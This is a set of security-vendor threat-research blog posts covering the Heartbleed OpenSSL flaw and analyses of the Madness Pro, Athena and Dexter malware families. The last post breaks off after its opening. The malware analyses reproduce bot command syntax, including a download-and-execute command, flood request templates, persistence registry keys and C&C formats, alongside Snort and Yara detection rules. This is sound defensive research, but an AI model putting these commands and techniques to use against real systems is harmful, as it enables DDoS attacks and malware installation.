The Heartburn Over Heartbleed: OpenSSL Memory Leak Burns Slowly

By: Arbor Networks -

Marc Eisenbarth, Alison Goodrich, Roland Dobbins, Curt Wilson

Background
A very serious vulnerability present in OpenSSL 1.0.1 for two years has been disclosed (CVE-2014-0160). This “Heartbleed” vulnerability allows an attacker to reveal up to 64kb of memory to a connected client or server. This buffer-over-read vulnerability can be used in rapid succession to exfiltration larger sections of memory, potentially exposing private keys, usernames and passwords, cookies, session tokens, email, or any other data that resides in the affected memory region. This flaw does not affect versions of OpenSSL prior to 1.0.1.  This is an extremely serious situation, which highlights the manual nature of the tasks required to secure critical Internet services such as basic encryption and privacy protection.

As the vulnerability has been present for over two years, many modern operating systems and applications have deployed vulnerable versions of OpenSSL. OpenSSL is the default cryptographic library for Apache and nginx Web server applications, which together account for an estimated two-thirds of all Web servers. OpenSSL is also used in a variety of operating systems, including BSD variants such as FreeBSD, and Linux distributions such as Ubuntu, CENTOS, Fedora and more. Other networking gear such as load-balancers, reverse proxies, VPN concentrators, and various types of embedded devices are also potentially vulnerable if they rely on OpenSSL, which many do. Additionally, since the vulnerability’s disclosure, several high-profile sites such as Yahoo Mail, Lastpass, and the main FBI site have reportedly leaked information. Others have discussed the impact on underground economy crime forums, which were reportedly vulnerable to the matter and were attacked.

A key lesson is that OpenSSL, which is a vital component of the confidentiality and integrity of uncounted systems, applications and sites across the Internet, is an underfunded, volunteer-run project, which is desperately in need of major sponsorship and attendant allocation of resources.

Mitigation
Anyone running OpenSSL on a server should upgrade to version 1.0.1g. For earlier versions, re-compiling with the OPENSSL_NO_HEARTBEATS flag enabled will mitigate this vulnerability. For OpenSSL 1.0.2, the vulnerability will be fixed in 1.0.2-beta2. In terms of remediation, there’s a huge amount of work that must be done, not only for servers, but also for load-balancers, reverse proxies, VPN concentrators, various types of embedded devices, etc.  Applications which were statically compiled against vulnerable versions of the underlying OpenSSL libraries must be re-complied; private keys must be invalidated, re-generated, and re-issued; certificates must be invalidated, re-generated, and re-issued – and there are a whole host of problems and operational challenges associated with these vital procedures. Some systems may be difficult to patch, so network access control restrictions or the deployment of non-vulnerable proxies may be considered where possible to reduce the attack surface.

Exploitation
In most cases, exploitation of this vulnerability leaves no sign in server logs, making it difficult for organizations to know if they have been compromised. In addition, even after applying the OpenSSL patch, private keys, passwords, authentication credentials or any other data that was stored in heap memory used by OpenSSL may have already been compromised by attackers, potentially going as far back as two years. Of significant concern is the compromise of private key material, and one security organization reported that they were able to obtain this material during testing. Others reported difficulty in obtaining certificate material but were able to discover significant amounts of other sensitive data. Considering how easy it is for attackers to hammer this vulnerability over and over again in a very quick sequence, the amount of memory being disclosed can be quite substantial. Memory contents will vary depending on program state and controlling what is returned and what position in memory the contents are read from is much like a game of roulette.

Risk to Private Key Material
Security researchers in a Twitter exchange starting on April 8 2014 indicate that private keys have been extracted in testing scenarios, and other researchers suggest that attacking the servers during or just after log rotation and restart scripts run could expose private key material. This allegation has not been tested by ASERT.

For further details, please see the Twitter thread at https://twitter.com/1njected/status/453781230593769472

image002

Incident Response and Attack Tools
While there has been some call to avoid over-reaction, organizations should strongly consider revoking and reissue certificates and private keys; otherwise, attackers can continue to use private keys they may have obtained to impersonate Websites and/or launch man-in-the-middle attacks. Users should change usernames and passwords as well, but should not enter login credentials on Websites with vulnerable OpenSSL deployments. To do so could invite attackers to compromise both the old and new credentials if they were exposed in memory.

Many tools have been made available to test for the vulnerability and these same tools are available for attackers to use as well. It is also reasonable to consider that the password reuse problem will again cause additional suffering, because the same passwords shared across multiple systems create an extension of attack surface. A shared password that provides access to a sensitive system, or to an e-mail account used for password resets, can be all that an attacker needs to infiltrate an organizations defenses along multiple fronts.

Multiple proof-of-concept exploits have already been published, and a Metasploit module has been published. Attackers of all shapes and sizes have already started using these tools or are developing their own to target vulnerable OpenSSL servers. There have been reports that scanning for vulnerable OpenSSL servers began before the disclosure of the bug was made public, although other reports suggest that these scans may not have been specifically targeting the Heartbleed vulnerability.

ATLAS Indicates Scanning Activity
ASERT has observed an increase in scanning activity on tcp/443 from our darknet monitoring infrastructure, over the past several days, most notably from Chinese IP addresses (Figure 1, below). Two IP addresses (220.181.158.174 and 183.63.86.154) observed scanning tcp/443 have been blacklisted by Spamhaus for exploit activity. Scans from Chinese sources are predominately coming from AS4143 (CHINANET-BACKBONE) and AS23724 (CHINANET-IDC-BJ-AP).

Figure 1:       TCP/443 scans, Tuesday – Wednesday (April 8-9)

image003

image005

Attacks observed by ASERT decreased by Thursday as of this report writing. China still accounted for the largest percentage of detected scan activity:

Figure 2:       TCP/443 scans, Thursday (April 10)

image007

image010

Pravail Security Analytics Detection Capabilities

Arbors Pravail Security Analytics system provides detection for this vulnerability using the following rules:

2018375 ­ ET CURRENT_EVENTS TLS HeartBeat Request (Server Intiated)

2018376 ­ ET CURRENT_EVENTS TLS HeartBeat Request (Client Intiated)

2018377 ­ ET CURRENT_EVENTS Possible OpenSSL HeartBleed Large HeartBeat
Response (Client Init Vuln Server)

2018378 ­ ET CURRENT_EVENTS Possible OpenSSL HeartBleed Large HeartBeat
Response (Server Init Vuln Client)

Examples of detection capabilities are reproduced below.

 

Heartbleed detection tool screenshot

Heartbleed detection tool screenshot

 

Analysis of Historical Packet Captures Using New Indicators
In the event of this, and other security threats that are highly emergent, organizations may wish to consider implementing analysis capabilities on archived packet captures in order to detect first signs of attack activity. Granular analysis using fresh indicators can help pinpoint where and when a targeted attack (or a commodity malware attack, for that matter) may have first entered the network, or when such attackers may have exfiltrated data using a technique that was not yet being detected on the wire during the time of the initial attack and infiltration. The capabilities of Pravail Security Analytics will give organizations the means to accomplish such an analysis. A free account is available at https://www.pravail.com/ and rest assured that this site is using the latest non-vulnerable OpenSSl version.

Longer-Term Implications and Lessons Learned
Serious questions have been raised regarding the notification process surrounding this vulnerability.  The operational community at large have voiced serious disapproval surrounding the early notification of a single content delivery network (CDN) provider, while operating system vendors and distribution providers, not to mention the governmental and financial sectors, were left in the dark and discovered this issue only after it was publicly disclosed via a marketing-related weblog post by the CDN vendor in question.  It has been suggested that the responsible disclosure best practices developed and broadly adopted by the industry over the last decade were in fact bypassed in this case, and concerns have been voiced regarding the propriety and integrity of the disclosure process in this instance.

Recent indications that a significant number of client applications may be utilizing vulnerable versions of OpenSSL as well has broad implications, given the propensity of non-specialist users to ignore software updates and to continue unheedingly running older versions of code.

Furthermore, only ~6% of TLS-enabled Websites (and an undetermined, but most probably even-smaller percentage of other types of systems) make use of Perfect Forward Secrecy (PFS). This configurable option ensures that if an issue of this nature arises, previously encrypted traffic retained in packet captures isn’t susceptible to retrospective cryptanalysis.

Without PFS, there are no automated safeguards that can ameliorate these issues, once a vulnerability of this nature has been exposed.  Many operators and users may not realize that if attackers captured packets of encrypted traffic in the past from vulnerable services/applications which weren’t configured with PFS – i.e., the overwhelming majority of such systems – and have retained those captured packets, they’ve the opportunity now to use analysis tools to replay those packets and decrypt the Internet traffic contained in those packets. This means that attackers can potentially unearth their credentials, intellectual property, personal financial information, etc. with access to previously captured packet-dumps.

The ability for an attacker to decrypt packet capture archives requires that the attacker has obtained the private keys used to encrypt that traffic. As recent research shows, this is not a theoretical vulnerability – private key material has been compromised in a lab environment and therefore we must assume that attackers have at least the same, if not more substantial capabilities.

The ‘Heartbleed’ vulnerability may well result in an underground market in ‘vintage’ packet captures – i.e., packet captures performed after the date this vulnerability was introduced into OpenSSL, and prior to some date in the future after which it is presumed that the most ‘interesting’ servers, services, applications, and devices have been remediated.

This incident has the potential to evolve into a massive 21st-Century, criminalized, Internet-wide version of the Venona Project, targeting the entire population of Internet users who had the ill fortune to unknowingly make use of encrypted applications or services running vulnerable versions of OpenSSL. This highlights the paradox of generalized cryptographic systems in use over the Internet today.

While the level of complexity required to correctly design and implement cryptosystems means that in most situations, developers should utilize well-known cryptographic utilities and libraries such as OpenSSL, the dangers of a cryptographic near-monoculture have been graphically demonstrated by the still-evolving Heartbleed saga.  Further complicating the situation is the uncomfortable fact that enterprises, governments, and individuals have been reaping the benefits of the work of the volunteer OpenSSL development team without contributing the minimal amounts time, effort, and resources to ensure that this vital pillar of integrity and confidentiality receives the necessary investment required to guarantee its continued refinement and validation.

This is an untenable situation, and it is clear that the current development model for OpenSSL is unsustainable in the modern era of widespread eavesdropping and rapid exploitation of vulnerabilities by malefactors of all stripes. Information on how to support the OpenSSl effort can be found here: https://www.openssl.org/support/

Heartbleed and Availability
While Heartbleed is a direct threat to confidentiality, there are also potential implications for availability.

In some cases, attackers seeking exploitable hosts may scan and/or try to exploit this vulnerability so aggressively that they inadvertently DoS the very hosts they’re seeking to compromise. Organizations should be cognizant of this threat and ensure that the appropriate availability protections are in place so that their systems can be defended against both deliberate and inadvertent DDoS attacks.

It should also be noted that initial experimentation seems to indicate that it’s easiest for attackers to extract the private keys from vulnerable OpenSSL-enabled applications and services, using the least amount of exploit traffic, immediately after they have been started.  Accordingly, organizations should be prepared to defend against DDoS attacks intended to cause state exhaustion and service unavailability for SSL-enabled servers, load-balancers, reverse proxies, VPN concentrators, etc.  The purpose of such DDoS attacks would be to force targeted organizations to re-start these services in order to recover from the DDoS attacks, thus providing the attackers with a greater chance of capturing leaked private keys.


References
http://www.openssl.org/news/vulnerabilities.html#2014-0160
http://heartbleed.com
http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html
http://news.netcraft.com/archives/2014/04/02/april-2014-web-server-survey.html
http://threatpost.com/seriousness-of-openssl-heartbleed-bug-sets-in/105309
http://arstechnica.com/security/2014/04/critical-crypto-bug-exposes-yahoo-mail-passwords-russian-roulette-style/
https://www.openssl.org/news/secadv_20140407.txt
https://isc.sans.edu/diary/Heartbleed+vendor+notifications/17929
http://possible.lv/tools/hb/
http://filippo.io/Heartbleed/
https://zmap.io/heartbleed/
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
https://gist.github.com/sh1n0b1/10100394
http://www.seacat.mobi/blog/heartbleed Note: This event may have been a false positive caused by ErrataSec’s masscan software (http://blog.erratasec.com/2014/04/no-we-werent-scanning-for-hearbleed.html)
http://arstechnica.com/security/2014/04/heartbleed-vulnerability-may-have-been-exploited-months-before-patch/
https://twitter.com/1njected/status/453781230593769472

Venona Project: http://en.wikipedia.org/wiki/Venona>
PFS: https://community.qualys.com/blogs/securitylabs/2013/08/05/configuring-apache-nginx-and-openssl-for-forward-secrecy

Can I Play with Madness?

By: Jason Jones -

Madness Pro is a relatively recent DDoS bot, first  seen by ASERT in the second half of 2013 and also profiled by Kafeine in October 2013. Kafeine’s blogpost gave good insight into one method of infection and how quickly a potent DDoS botnet can be built. This post will take a deeper-dive into what Madness does upon infection of a system and what its attack capabilities are.

Installation

Madness uses standard methods to achieve persistence on the system and evade detection. For persistence, it sets up autorun via:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun if the user does not have admin privileges
  • via HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun
  • if that fails to HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun if the user does have admin privileges

It also creates 4 files in the user’s home folder named per, perper, perperper, perperperper (hint: search for these filenames on malwr.com to find more samples :) ) that contain the registry key values above followed by [7] and [8] for WORLD_FULL_ACCESS and WORLD_READ_ACCESS and run regini on the file to setup the registry permissions on those registry keys before doing the above. A mutex named GH5K-GKL8-CPP4-DE24 will also be created to block multiple installations of Madness (since the mutex we have observed has been the same across all samples we have encountered, it also blocks competitors). It will then attempt to bypass the firewall in Windows XP/Vista/7/8 by turning it off the service  and then disabling autostart of that service.

Many of the interesting strings are encoded with Base64, which include the above-mentioned registry keys, commands, mutex values and operating system names. This makes many of the strings very recognizable and easy to identify with a Yara rule. One example rule has been committed to our GitHub repository.

Capabilities

Capability-wise, Madness Pro has a large number of DDoS attacks and a download and execute command. The latest version we have observed in the wild is 1.15. The network phone-homes for Madness resemble the WireShark screenshot below. They include a unique randomly-generated bot ID, a version, the mk parameter, the OS version, privilege level on the system, c – a counter for the number of phone homes, rq – a counter for the number of successful attack payloads sent since the last phone-home. The response from the server is a base64-encoded, newline-separated list of commands. Multiple targets can be specified per command by separating them with a semicolon.

Madness Phone-Home

Madness Phone-Home

I also wrote a Suricata / Snort rule to detect these phone-homes:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[ASERT] TROJAN W32/Madness Checkin"; flow:established,to_server; content:"GET"; http_method; content: "?uid="; pcre: "/?uidx3d[0-9]{8}x26verx3d[0-9].[0-9]{2}x26mkx3d[0-9a-f]{6}x26osx3d[A-Za-z0-9]+x26rsx3d[a-z]+x26cx3d[0-9]+x26rqx3d[0-9]+/"; reference:url,www.arbornetworks.com/asert/2014/01/can-i-play-with-madness/; reference:md5,3e4107ccf956e2fc7af171adf3c18f0a; classtype:trojan-activity; sid:3000001; rev:1;)

The DDoS attacks use a combination of WinSock, WinInet (InternetOpenRequestA + HttpSendRequestA), and UrlMon (URLDownloadToFileA) functions. The identified commands are shown below:

exe   - download and execute file
wtf   - stop attacks
dd1   - GET Flood using WinSock
dc1   - AntiCookie GET Flood using WinSockds1   - Slow GET Flood using WinSock
dd2   - POST Flood Using WinSock
dd3   - GET Flood Using WinInet
dd4   - POST Flood Using WinInet
dd5   - ICMP Flood Using WinSock
dd6   - UDP Flood Using WinSock
dd7   - HTTP Flood Using URLDownloadToFileA

The POST and UDP floods both support specification of flood text by appending ‘@@@’ and then the flood text (default is ‘flud_text’). The Cookie recognition code will look for document.cookie and cookies specified of the form ["cookie","realauth=<value>","location"] and attempt to parse the value out.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1
Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128
Mozilla/4.0 (MobilePhone SCP-5500/US/1.0) NetFront/3.0 MMP/2.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
Mozilla/4.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/4.0 (Windows NT 5.1; U; en) Presto/2.5.22 Version/10.50
Mozilla/4.0 Galeon/1.2.0 (X11; Linux i686; U;) Gecko/20020326
Opera/10.80 (SunOS 5.8 sun4u; U) Opera 10.8 [en]

The flood template for the WinSock POST request is below, note that the Referer and Cookie headers are only included in the attack if there are referer and cookie values. The user-agent will be incrementally selected from the list above (although the AntiCookie code has a small bug :) ). The WinSock GET and AntiCookie GET attacks use similar templates sans the POST data and of course with the GET HTTP verb instead of POST HTTP verb.

POST <uri> HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: <target>
Content-Length: <length>
User-Agent: <user-agent from list>
Referer: <referer>
Cookie: <cookie>
Cache-Control: no-cache
Connection: Keep-Alive

<post data>

The Slow GET flood only sends the GET request and a Host header, sleeps for 100 milliseconds, and then send the rnrn to finish the request.

The UDP and ICMP floods are pretty standard compared to most other DDoS bots. The download and execute command functionality has been used sparingly from the CnCs that we have tracked, except for….

Playing with Madness

Sometimes a botnet admin mistakenly gives you an FTP download link with server credentials that allows for retrieval of an intact panel that includes credentials for the admin area of the web panel. Fortunately, this admin only had a total of 10 bots and at least 3 of those were researchers :). There’s not much more to the admin panel than what is showed in the screenshot below:

Madness Panel 1.13

Madness Panel 1.13

Madness Symbols

Madness Symbols

Sometimes the malware author forgets to run ‘strip’ on the binaries he’s generating for customers and these end up in my hands. Unfortunately not until after I had finished my initial reversing, but I was able to validate my analysis and also investigate identify a few things I had not noticed before. One of the interesting things that was not referenced in any calls in that version (and has been since – now the dc1 attack) was the WinSockGetAntiCookies function and in the latest 1.15 version.

We’ve also had Madness in our botnet tracking system for a number of months and have some interesting data on some of the sites that have been targeted. One of the most popular targets appears to be the ”underground” forum fuckav.ru, but the botnets do not appear to be very large as the availability of the site does not appear to be affected very much. The locations of the CnCs tracked are fairly geographically disparate –  locations that we have found CnCs hosted include the United States, Russia, Slovakia, Netherlands, and France.

Conclusion

Given the breadth of the DDoS attacks available in Madness and the ability to attack large numbers of targets at the same time, it does not appear that Madness will be going away anytime soon in the DDoS space. A number of very active CnCs have been observed so far, and we can only expect to see more in the future.

Related MD5:
cc303da2c4b7a031d578c1dbf5af1970
027dcd2e6d231598c47557bdea98843d
60c77216bfcc21a2b993ca7e688f5b20
df99277fb3946c0327f10dc1c501452c
3fb38453a63dca35c0e751a709485e2b
32187e96c5af1177c35813c17302babf

Happy Holidays: Point of Sale Malware Campaigns Targeting Credit and Debit Cards

By: cwilson -

Inside Recent Point-of-Sale Malware Campaign Activities

Curt Wilson, Dave Loftus, Matt Bing

An active Point of Sale (PoS) compromise campaign designed to steal credit and debit card data using the Dexter and Project Hook malware has been detected. Indicators of compromise will be provided for mitigation and detection purposes. Prior to the publication of this Threat Intelligence document (embedded at the end of this post), members of the FS-ISAC, major Credit Card vendors and law enforcement were notified.

It appears that there are at least three distinct versions of Dexter:

  1. Stardust (looks to be an older version, perhaps version 1)
  2. Millenium (note spelling)
  3. Revelation (two observed malware samples; has the capability to use FTP to exfiltrate data)

In early November 2013, ASERT researchers discovered two servers hosting Dexter and other POS malware to include Project Hook.  The Dexter campaign looks more active, especially in the Eastern Hemisphere and therefore shall be the main focus herein. Dexter, first documented by Seculert in December 2012, is a Windows-based malware used to steal credit card data from PoS systems. The exact method of compromise is not currently known, however PoS systems suffer from the same security challenges that any other Windows-based deployment does. Network and host-based vulnerabilities (such as default or weak credentials accessible over Remote Desktop and open wireless networks that include a PoS machine), misuse, social engineering and physical access are likely candidates for infection. Additionally, potential brittleness and obvious criticality of PoS systems may be a factor in the reportedly slow patch deployment process on PoS machines, which increases risk. Smaller businesses are likely an easier target due to reduced security. While the attackers may receive less card data from smaller retailers, infections may be more numerous and last longer due to the lack of security reporting and security staff in such environments.

Figure 1: Dexter (Purple) and Project Hook (Orange) infections in the Eastern Hemisphere

Dexter and Project Hook infections in the eastern hemisphere

Figure 2: Dexter (Purple) and Project Hook (Orange) infections in the western hemisphere

Screen Shot 2013-12-03 at 1.22.00 AM

For the full document to include a list of various compromise indicators and information about the back-end infrastructure, please download the full public report -

Dexter and Project Hook Break the Bank

 

Athena, A DDoS Malware Odyssey

By: Jason Jones -

The Athena malware family  has existed for quite some time and appears to have a love/hate relationship based on posts in various “underground” forums . The original version was IRC-based, but earlier this year an HTTP-based version was released. While not as prevalent as other malware families, Athena has had a strong presence in our malware processing system for quite some time. This blog post will discuss it’s origins, DDoS capabilities, and go over it’s latest evolution and offer some details on how to identify it.

Athena’s IRC Origins

I first discovered Athena via a Pastebin post that showed an IRC log of someone ordering attacks via an IRC channel. Some googling and then subsequent searching of our zoo for the patterns yielded a wide range of versions of Athena IRC. Many of these appeared to be used to install other malware and not so much for DDoS. The majority of CnC would put a few sets of initial commands in the IRC channel topic to order their bots to botkill, download other malware, attack a specific site, etc. Athena IRC also used a recognizable IRC nick format:

n[<country>|<privilege>|<desktop/laptop>|<OS version>|<architecture>|??][a-z]{8}
AthenaIRC 2.3.1 Manual Cover

AthenaIRC 2.3.1 Manual Cover

Athena has been around for a number of years and is the product of a programmer who goes by the handle “_Stoner“. In the 1.X days of Athena IRC, builders were distributed, but these were cracked and posted online for anyone to use in botnet building escapades without having to purchase. Some of these cracked builders contained strings disparaging the quality of Athena and also referenced IPKiller (aka MP-DDOS) being  superior.

The 2.X versions saw this distribution model change and _Stoner now controls the building and distribution of binaries for his customers. Judging from forum posts and proliferation of various versions that we have seen come through our zoo business seems to be going well. However, there are numerous complaints on some of the forums about _Stoner going into their IRC servers and channels and taking control of their botnets. He is quick to respond that this is not the case, but that does not appear to help his reputation in some of the underground communities. The version 2 series also saw a significant amount of commands added: more DDoS commands, more password stealing functionality, “IRC War” commands, file find and upload, etc. The bot also optionally features an “encrypted” IP option for the CnC that  obfuscates the IP address  by adding or subtracting a static value from each octet of the IP depending on where it falls in the top or bottom half of the valid octet range. This feature was observed in our sandboxing system many times where a CnC hostname pointed to an IP, but a different IP was then connected to for CnC – quite confusing initially, but easy to spot once we found out some of the binaries had this feature. Athena also has encrypted commands that simply use a lookup table to find an index into a keyring and then a secondary lookup to get the decrypted character.

The pricing structure for 2.3.1 is $100 for one build, $10 to rebuild or update, $15 to have _Stoner setup your IRC, and $130 for a ready-made IRC channel that is “capable of holding 20k bots” and one build.

Athena, Goddess of IRC War?

Not quite :) When I first started reversing Athena IRC, I felt like I was Daedalus trying to navigate the Labyrinth. I finally found my way to an exit and avoided the Minotaur whilst discovering where the DDoS commands were processed.

Athena IRC Command Parsing

Athena IRC Command Parsing

Athena offers many DDoS attacks including standard HTTP GET/POST floods, UDP flood, RUDY, Slowloris, Slowpost, ARME, HTTP flood via hidden browser, bandwidth floods and an established connection flood attack.  The attacks perform as advertised, but, unlike other DDoS bots, only one attack at a time can be carried out. This severely limits its ability to compete in the underground DDoS-for-hire marketspace with other bots like Madness, Drive, and DirtJumper

For its HTTP-based attacks, Athena uses one subroutine to construct the HTTP request template. Random numbers are generated and if they are above or below certain values then different values are selected for the header and in some cases the randomly generated value is used to determin whether or not to include a header at all. The image below illustrates the possible headers that are include and the potential values for those that are to be included. Green means the value is selected based on which attack is ordered, values in black are always included, headers in blue are randomly included and then the red values are the values that the final header value is selected from.

Athena HTTP Request Building

Athena HTTP Request Building

Athena Moves to HTTP

The HTTP version of Athena first popped onto my radar in late March of this year when Exposed Botnets covered it for the first time, but I was not able to locate any samples at the time. Fast forward a few weeks and many samples started flowing our way.

The command and control protocol for Athena HTTP is fairly interesting. There are three parameters – a,b and c – that are sent with the POST request to the CnC. The a parameter is a fully URL encoded base64 string, that will provide a colon separated string translation table. The string translation table will be used on the b parameter which is another base64 string – this time not URL encoded – and then base64 decoded to yield the phone-home data of the bot, and c is used as a data marker on the response from the server. The initial phone home format format string is below, where gend is the “gender” (laptop,desktop,etc.), ver is the Athena HTTP version installed, net is the .NET version installed, and the rest are fairly self-explanatory.

  |type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|

and then subsequent phone-homes will use this format string. The bk_ signify “botkill” data, and busy signifies whether or not the bot is busy with a command.

  |type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

The server will use the string translation table sent by the bot on the set of newline-separated, base64-encoded commands before adding the data marker to the front of the string. Without the original phone-home from the bot, this makes determining the commands sent by the cnc extremely difficult. The commands sent by the CnC are pipe-delimited with taskid=<task id> in the first part and then command=<command>  in the 2nd part.

The commands actually follow the exact same structure as the IRC version and the same parsing method is used once the command is extracted and some examples are presented below:

|taskid=120|command=!ddos.layer4.udp <target-site> <port> <time>|
|taskid=115|command=!ddos.http.bandwidth <target-url> <port> <time>|
|taskid=37|command=!download <target-url> 1|

A script to decode the phone-home and display commands is included in the ASERT GitHub repository.

Athena Commands Her DDoS Army

Some careless botnet admins left archives of their control panels floating around on their CnCs which greatly sped up my reverse engineering of how the Athena HTTP binaries were operating. The server-side PHP code has a decent amount of obfuscation, but it is not terribly difficult to bypass. The screenshots below show the stages of deobfuscation that I went through when recovering to readable PHP code:

The panel isn’t anything flashy, but is quite usable and shows the state of all bots and commands. I fired up an internal version of the control panel to experiment with and the results are below (please note: these are not real commands, all fake):

Athena, Beyond DDoS

Athena HTTP shares the previously described weakness of only being able to carry out one attack at a time and has not been observed to be nearly as active in the DDoS space as other bots monitored by ASERT. This brings up the question of what is it used for? One of most popular uses that we have observed on the CnCs that we monitor is as a pay-per-install (PPI) botnet. Over the last 6 months, we have collected over 150 new executables by monitoring what URLs were told to be downloaded. A timeline graph is shown below, unlabeled yellow dots were samples that were  unidentified by our tagging system and also did not exist on VirusTotal at the time of initial processing. Many of these turned out to be Bitcoin/LiteCoin/etc miners, while other were some password stealing applications. Apologies for the overlap on names, but it was extremely difficult to get them as non-overlapped as they are due to the high volume during a few short periods where people appeared to be testing out their new botnets :). The large gap in late August through early / October was due to a slight change in identification that caused our monitoring system to miss new samples and is not necessarily reflective of new malware not getting dropped.

Athena HTTP Dropped Malware Timeline

Athena HTTP Dropped Malware Timeline

 

Athena’s Achilles Heel

Easy identification via multiple means. The easily identifiable IRC nicks and recognizable HTTP POSTs discussed previously make detection on the network easy, but there are also many other ways to identify both versions of this malware. Athena – both IRC and HTTP – typically uses mutexes that look like  (UPDATE_|BACKUP_|MAIN_)-?[0-9]{10} (great for finding samples on malwr.com via mutex: search)  and additionally has many easily identifiable strings depending on the version. One such yara rule is presented below that catches many, but not all, versions of the IRC version and another rule that has so far detected all of the HTTP versions we have seen is also presented – these are also available in the Arbor Github repository. The Microsoft Security Essentials engine identifies the IRC and early versions of  Athena HTTP as Trojan:Win32/Squida.A, but has more recently started identifying Athena HTTP as Trojan:Win32/Folyris.A.

 

rule athena_http{
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description= "Athena HTTP identification"
 strings:
   $fmt_str1="|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|"
    $fmt_str2="|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|"
    $cmd1 = "filesearch.stop"
    $cmd2 = "rapidget"
    $cmd3 = "layer4."
    $cmd4 = "slowloris"
    $cmd5 = "rudy"
 condition:
     all of ($fmt_str*) and 3 of ($cmd*)
}
rule athena_irc {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Athena IRC v1.8.x, 2.x identification"
  strings:
    $cmd1 = "ddos." fullword
    $cmd2 = "layer4." fullword
    $cmd3 = "war." fullword
    $cmd4 = "smartview" fullword
    $cmd5 = "ftp.upload" fullword
    $msg1 = "%s %s :%s LAYER4 Combo Flood: Stopped"
    $msg2 = "%s %s :%s IRC War: Flood started [Type: %s | Target: %s]"
    $msg3 = "%s %s :%s FTP Upload: Failed"
    $msg4 = "Athena v2"
    $msg5 = "%s %s :%s ECF Flood: Stopped [Total Connections: %ld | Rate: %ld Connections/Second]"
    // v1 strs
    $amsg1 = "ARME flood on %s/%s:%i for %i seconds [Host confirmed vulnerable"
    $amsg2 = " Rapid HTTP Combo flood on %s:%i for %i seconds"
    $amsg3 = "Began flood: %i connections every %i ms to %s:%i"
    $amsg4 = "IPKiller>Athena"
    $amsg5 = "Athena=Shit!"
    $amsg6 = "Athena-v1"
    $amsg7 = "BTC wallet.dat file found"
    $amsg8 = "MineCraft lastlogin file found"
    $amsg9 = "Process '%s' was found and scheduled for deletion upon next reboot"
    $amsg10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
    // Athena-v1.8.3
    $amsg11 = "Rapid Connect/Disconnect"
    $amsg12 = "BTC wallet.dat found,"
    // v1 cmds
    $acmd1 = ":!arme"
    $acmd2 = ":!openurl"
    $acmd3 = ":!condis"
    $acmd4 = ":!httpcombo"
    $acmd5 = ":!urlblock"
    $acmd6 = ":!udp"
    $acmd7 = ":!btcwallet"
  condition:
    (all of ($cmd*) and 3 of ($msg*)) or (5 of ($amsg*) and 5 of ($acmd*))
}

Related MD5:

Athena IRC

3eb262817d8ab8a6f2282f0455c6ac03
859c2fec50ba1212dca9f00aa4a64ec4
0044e1e55b9524cc72b4060e5e84293d
cd962b1cfdfa6e3921adfc3750e95282
02214f425bf9c2c67d49e267bc4c84f6

Athena HTTP

2a8b26d216aea6fad8dd2297fd054413
e8bda57d4ca45cbe5d780a87e5052d0a
2d9f8082be96150b7f483ea5e863fcaa
7535a5ee124612cbaaf0e5a53b29158a
f1c083104fa4992e9f47a5b87e2c64f0

Introducing the Digital Attack Map

By: Dan Holden -

What our ATLAS data highlights is just how commonplace DDoS attacks have become – both in terms of frequency but also in terms of how many Internet users are impacted by DDoS. It’s not just a problem for large, global organizations and service providers, but anyone with an Internet connection can be caught in the crossfire of an attack. The ‘collateral damage’ of an attack against a large organization or service provider are the people that rely on those networks every single day.

That’s why Google Ideas and Arbor have collaborated on a Digital Attack Map – a project we’re very excited to announce today.

Digital Attack Map 2013-10-21 09-27-31[1]

The Digital Attack Map utilizes anonymous traffic data from our ATLAS® threat monitoring system to create a data visualization that allows users to explore historical trends in DDoS attacks, and to make the connection to related news events on any given day. The data is updated daily, and historical data can be viewed for all geographies.  This collaboration brings life to the ATLAS data we leverage every day to uncover new attack trends and techniques, sharing it in a visual way that connects the dots between current events and cyberattacks taking place all over the world.

We invite you to explore the Digital Attack Map to see for yourself how DDoS has become a global threat to the availability of networks, applications and services that billions of people rely on every day.

DirtJumper Drive Shifts into a New Gear

By: Jason Jones -

The last time I wrote about Drive it was still following the old model of DirtJumper-variant phone-homes and all the communications were in plaintext. I recently discovered a new variant that diverges from the DirtJumper-variant phone home and adds a number of new attacks, including one that attempts to bypass some known mitigation techniques that it calls -smart and appears to be one of the first pieces of DDoS malware that attempts to detect mitigations being used and bypass them.

Introduction

